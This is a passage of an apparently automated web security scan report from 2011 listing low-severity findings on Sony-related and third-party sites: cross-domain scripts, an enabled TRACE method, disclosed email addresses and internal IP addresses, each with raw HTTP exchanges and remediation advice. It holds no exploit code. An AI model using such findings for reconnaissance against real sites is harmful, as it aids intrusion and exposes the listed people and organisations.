<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.20. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78487
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

12. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.omnitechsupport.com
Cookie: f89c5702c2142a6c

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.omnitechsupport.com
Cookie: f89c5702c2142a6c; model=VGNNR180E


13. Email addresses disclosed  previous  next
There are 12 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


13.1. http://www.flickr.com/groups/sonycameraclub  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The following email address was disclosed in the response:

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">peter@snapoftheshutter.com</a>
...[SNIP]...

13.2. http://www.flickr.com/groups/sonycameraclub/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The following email address was disclosed in the response:

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">peter@snapoftheshutter.com</a>
...[SNIP]...

13.3. http://www.huddletogether.com/projects/lightbox2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

13.4. http://www.omnitechsupport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.5. http://www.omnitechsupport.com/about.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /about.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.6. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.7. http://www.omnitechsupport.com/spyware_removal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.8. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

13.9. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

13.10. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

13.11. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT
Accept-Ranges: bytes
ntCoent-Length: 36836
Content-Type: application/x-javascript
Content-Length: 36836
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

13.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The following email address was disclosed in the response:

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76256
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadI
...[SNIP]...
<a href="mailto:mailto:Sony-Electronics@sel.sony.com">Sony-Electronics@sel.sony.com</a>
...[SNIP]...

14. Private IP addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


14.1. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...

14.2. http://www.facebook.com/sonyelectronics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

14.3. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jun 2011 18:38:05 GMT
Accept-Ranges: bytes
ntCoent-Length: 28134
Content-Type: application/x-javascript
Content-Length: 28134
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// TEMPORARY FREEZE OVERRIDE
function unFreezePage() {}
function freezePage() {
   popOpen('busyIndicator');
   document.getElementById('busyIndicator').style.cursor = "wait";
   
   var delayedFunction = f
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
